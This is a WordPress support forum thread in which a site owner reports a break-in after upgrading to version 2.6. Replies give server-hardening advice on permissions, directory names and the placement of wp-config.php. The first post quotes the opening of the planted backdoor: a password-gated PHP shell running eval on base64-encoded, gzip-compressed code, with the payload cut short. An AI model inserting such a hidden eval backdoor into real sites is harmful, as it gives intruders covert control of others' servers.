Support » Requests and Feedback » WP 2.6 is hackable, hacked?

  • I just updated to wordpress 2.6 about a week ago.

    Someone easily got onto my server and added a bunch of encoded code that adds extra pages to my main site, and made exploits on other sites on my server as well that don’t even have wordpress installed. They started the hack in a file in the “wp-admin” folder called “edit-page-set.php” – it was 45kb.

    Here’s a sample of the code:

    <?php
    session_start();
    if(md5($_POST[pass])=='4ca83123fc97ebb33540d9ccda571335')
    {$_SESSION[logged]=1;}
    if(!$_SESSION[logged])
    {
    print "<div style='position:absolute;left:40%;top:50%;'><form method=post><input name=pass><input type=submit value=login></form></div>";
    exit;}
    eval(gzinflate(base64_decode('FJ3HcqPsFkUf53YVA3IakoPIGSa3yCByDk//y5Me..........

    There’s several hundred lines of encoding after the above code.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Just because that is the file changed does not mean wordpress was hacked. It is way more likely they got in some other way then did their dirty work. In any case, inform your host immediately if you are on a shared server so others will not be at risk, also.
    Look through your logs for a clue as to where they got into the server.

    Blaming the product to start with, is too easy. Making it hard to hack a site starts with your own precautions. It seems to me you did NOT take any.

    If your site is hacked (no matter where your site is hosted and how it’s ‘hacked’), you should first check what _you_ should have done to prevent overwriting your files: Set the right protection on your directories and files.
    In general, all directories containing WordPress code and data as well as the code itself should be marked READONLY for World; just allow WRITE access to the owner (yourself). Add Write access to the upload directories only, limited, if possible, to the group the webserver belongs to. Your webserver should be running in a non-privileged environment, whenever possible – in some environments it’s easier than in others.

    Another rule-of-thumb: NEVER use default locations. Altough WordPress installs on a /wordpress/ directory, there is n nead at all to stick to that name, and changing it to (wor instance) /wp26/ – and change the mapping in your webserver accoringly) will do no harm at all. It offers more facilities as well.
    Mark the directories non-browsable by a webbrowser. Especially the one containg wp-config.php: it contains very sensitive data to access your database (I moved this to a separate file that is then included into wp-config.php; the location is not mapped in the webserver, and is not accesable by anyone but me (RW) or the webserver (R).

    Some of these precaustions are easy on any system, others are easy on mine, but probably troublesome on others.

    Since 2.6 you can put the wp-config.php file in a directory ABOVE your WP install and WP will know to look for it without you doing anything. Read the instructions in the config file in 2.6.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘WP 2.6 is hackable, hacked?’ is closed to new replies.